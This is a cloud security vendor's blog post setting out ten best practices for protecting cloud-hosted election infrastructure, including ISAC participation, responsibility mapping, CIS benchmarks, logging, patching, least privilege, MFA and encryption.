At the heart of any democracy is the power of the individual voter. When the trust surrounding that system is called into question, the populace’s faith in that democracy begins to crumble. Although to some this may sound like hyperbole, voting systems are increasingly moving into the digital age with the backend infrastructure supporting them running in public clouds. Skillful hackers do not typically attack voting machines directly (unless it’s at DefCon) but rather probe for the weakest link in the election security chain. Common targets are systems storing voter registration databases (VRDBs), ballot definition files (BDF) or electronic pollbooks (e-Pollbooks). This being said, it is the duty of election officials to ensure they and their vendors are not only following best practices, but also fully understand public clouds shared security responsibility model with the control, compliance and visibility gaps it presents. To that end, the RedLock Cloud Security Intelligence (CSI) team has developed our Top 10 List for Election Security Best Practices. While purposefully not exhaustive, election officials and their teams can use this as the starting point for ensuring their cloud-based systems are safe and secure.
“The journey of a thousand miles begins with the first step.” - Laozi
Elections Infrastructure Information Sharing & Analysis Center (EI-ISAC) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) were created as threat prevention, protection and response forums for state and local governments. Created by the Center for Internet Security (CIS), these groups are instrumental to the health of democracy as they allow state and local officials supporting the election process to share intelligence and train on cybersecurity threats. State and local leaders, as well as election administrators, need to make participating in these ISACs a priority not only for their teams but also for themselves. Teams will know leaders are serious when active participation in these ISACs are included in yearly goals. These ISACs not only keep leaders and their staff informed, they also check the box for cybersecurity awareness and training.
With voting machines in a local district and the critical backend infrastructure supporting them running on Amazon Web Services (AWS), Google Cloud Platform (GCP) or Microsoft Azure, officials and their vendors need to take time to fully appreciate the uniqueness of cloud service provider (CSP) security models. While they each do a stellar job managing the security they are responsible for in each of their platforms, state and local officials need to ensure they have clearly mapped out who is responsible, accountable, consulted and informed for each of the critical areas of security in the cloud.
Figure 1: Security Responsibility Matrix
The most straightforward way to accomplish this task is to utilize the above security responsibility matrix and overlay it with a RACI. To illustrate what this might look like, we’ve created the below example.
Figure 2: Responsibility Assignment Matrix
Federal, State and Local governments, as well as their vendors, are embracing public cloud computing due to the increased flexibility as well as cost reduction benefits that it affords them. However, both government and vendor security teams often struggle to keep track of assets and accurately identify risks in these dynamic environments. This exact scenario was uniquely illustrated in 2017 when database manager and equipment contractor Election Systems & Software (ES&S) left a now infamous AWS S3 bucket exposed on the public Internet. Election officials and their vendors are strongly encouraged to invest in technologies that keep both a near-real time asset inventory of all cloud-related assets as well as current and historical configurations. Remember, it’s impossible to secure what you don’t know about.
CIS has created a number of platform-specific benchmarks that can be utilized to harden applications, cloud provider platforms (AWS & Azure; Google coming soon) as well as many of the operating systems and applications that will support election backend infrastructures. Organizations that standardize on CIS benchmarks are able to greatly reduce staff documentation burdens as well as free critical cybersecurity resources to instead focus on governance and other activities. It is strongly recommended that for any cloud platform supporting the elections process a CIS benchmark be utilized and then more importantly, an automated system be utilized to ensure the systems stay in compliance with that standard. When relying on third-party vendors, ensure that your contracts also require following these standards as well.
Figure 3: Illustration of the different areas of logging in public cloud platforms.
The cloud introduces an additional layer of logging at the cloud infrastructure level (see image below), not found in on-prem environments, which exponentially increases the verbosity and size of logs. The CSI team does not recommend attempting to funnel all cloud events directly to a security information and event management tool (SIEM) as this will typically be cost prohibitive in terms of events per second licensing (EPS). Instead, IT and security teams should utilize the clouds native storage capabilities for log warehousing and then rely upon an in-cloud third-party platform to filter for noteworthy events. Of equal importance to logging and monitoring in the cloud, but which is often extremely difficult with native cloud provider tools, are logs detailing network traffic both in and out of the cloud environment from the Internet (north/south), as well as within the cloud environment (east/west). Given the sheer volume of logs, it is critical that the in-cloud tool apply machine learning to connect the dots between configuration, user activity, and network traffic data. Given the interconnected nature of public cloud and election ecosystems, it is critical that no logs be left unmonitored.
In its simplest form, application whitelisting is the process of defining which applications are expressly permitted to run on a system. If an application attempts to execute that is not on the whitelist, its execution is blocked. Application whitelisting is a seldom used control that when used effectively can drastically reduce the impact of ransomware and other types of cyber incidents. Election officials and their technology teams would be wise to ensure that all critical infrastructure supporting election systems utilize application whitelisting. For further information on application whitelisting, we recommend reading NIST Special Publication 800-167.
While admittedly not new, swift patching remains one of the most effective methods for reducing the risk of cyber related incidents to election systems. RedLock’s Cloud Security Intelligence team research shows that 24% of organizations have high-severity patches missing in their public cloud environments. Don’t let your critical voting infrastructure fall into this category. No matter the responsibility split in your organization, it is critical that patches in both the OS and application are tested and then quickly deployed to production systems.
The principle of least privilege has been around for centuries, however for computing it remains relatively new seeing its introduction in the 1970’s. Radically reduced administrative privileges, combined with application whitelisting remain two of the most powerful and widely unused tools for combating cyber attacks. In practical terms, if a contractor is being utilized for the creation of ballot definition files (BDF), their access should be expressly limited to those systems where the BDFs are stored and their accounts providing remote access should be time limited e.g., if the contract is only for one year, Identity and Access Management (IAM) systems should automatically enforce account expiration at the one year mark.
Weaks passwords have frequently been utilized to breach networks and a prevalence of data breaches have resulted in many password dumps. While not without its own risks, employing multi factor authentication (MFA) remains one of the surest ways to add immediate defense in depth to the critical election infrastructure supporting our democracy. The CSI team recommends that MFA be enforced on every system in the ecosystem supporting the election process. While there are many forms of MFA with some being stronger than others (phone based SMS being on the weaker side and hardware tokens being the strongest), what’s most important is that some type of MFA be implemented for any users with elevated privileges. The CSI team also recommends that election officials ensure that vendors are contractually required to utilize MFA and that contract language also requires annual 3rd party testing of these controls.
Encryption is not a security panacea but when implemented properly it can be the last line of defense during a breach. The first thing to encrypt is all data in transit. While in the past it was considered acceptable to let traffic pass in the clear on internal “trusted networks”, this is no longer the case in public cloud given multi-tenant hosts. All traffic entering and exiting your cloud services should be encrypted and verified to be using SSL/TLS or IPSEC protocols. Data residing on your cloud services should also be encrypted at both the disk and database levels. While encryption is an excellent tool in any election officials arsenal, it’s only as good as your secret key protection strategy. The CSI team recommends the use of hardware security modules (HSM) which help organizations to control and manage disk encryption keys and secrets. Cloud service providers typically offer these as part of their offerings and it is recommended that they be utilized for a complete in-cloud encryption solution.
True democracy requires that voters trust the election process from beginning to end. It is the duty of election officials to ensure they and their vendors are not only following security best practices, but also fully understand the control, compliance and visibility gaps that exist when using public cloud platforms. By utilizing and continuously measuring cybersecurity programs against the 10 steps provided, Federal, State, and Local governments can courageously fight, and win, against determined nation-state attackers.